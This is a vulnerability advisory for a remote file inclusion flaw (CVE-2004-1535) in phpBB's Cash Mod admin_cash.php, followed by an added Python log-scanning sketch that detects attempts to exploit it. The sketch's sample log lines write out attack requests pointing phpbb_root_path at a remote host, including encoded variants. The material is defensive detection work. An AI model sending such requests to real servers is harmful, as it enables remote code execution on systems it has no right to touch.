PT-2004-2443 · Phpbb · Phpbb

Jerome Athias · Published 2004-12-31 · Updated 2017-07-11 · CVE-2004-1535

CVSS v2.0: 7.5 (High)

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions

phpBB Cash Mod module (affected versions not specified)

Description

The issue allows remote attackers to execute arbitrary PHP code by modifying the phpbb_root_path parameter to reference a URL on a remote web server that contains the code. This is achieved through a remote file inclusion vulnerability in the admin_cash.php file for the Cash Mod module.

Recommendations

For the Cash Mod module, consider restricting access to the admin_cash.php file until a patch is available. As a temporary workaround, avoid using the phpbb_root_path parameter to reference external URLs.
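Until a patch is in place, web server logs can show whether the parameter is being pointed at external URLs. The following detection sketch is an added example, not part of the advisory or of the Cash Mod code; the log format, addresses, host names and the /forum/admin/ path in the sample are constructed, and the function name is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines; addresses, hosts and paths are illustrative.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2005:10:00:01 +0000] "GET /forum/admin/admin_cash.php?phpbb_root_path=http://remote.example/ HTTP/1.0" 200 512
203.0.113.7 - - [10/Jan/2005:10:00:05 +0000] "GET /forum/admin/admin_cash.php?phpbb_root_path=hTTp%3A%2F%2Fremote.example%2F HTTP/1.0" 200 512
203.0.113.8 - - [10/Jan/2005:10:00:09 +0000] "GET /forum/admin/admin_cash.php?phpbb_root_path=http%253A%252F%252Fremote.example%252F HTTP/1.0" 200 512
198.51.100.4 - - [10/Jan/2005:10:01:00 +0000] "GET /forum/admin/admin_cash.php?phpbb_root_path=./../ HTTP/1.1" 200 2048
198.51.100.9 - - [10/Jan/2005:10:02:00 +0000] "GET /forum/viewtopic.php?t=5 HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value is treated as remote if it starts with a scheme (http:, ftp:, php:, ...),
# a protocol-relative "//host", or a UNC-style "\\host" prefix.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.I)


def _decode(value, rounds=3):
    """Undo nested percent-encoding (parse_qsl has already decoded once)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_text, script="admin_cash.php", param="phpbb_root_path"):
    """Return (client, decoded_value) for requests to `script` whose `param`
    query value references a remote location instead of a local path."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/" + script):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = _decode(value)
            if name == param and REMOTE_RE.match(value):
                hits.append((client, value))
    return hits
```

Access logs record only the query string, so a value submitted in a POST body will not appear here and needs request-body logging or a WAF rule to catch.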

Related Identifiers

CVE-2004-1535

Affected Products

Phpbb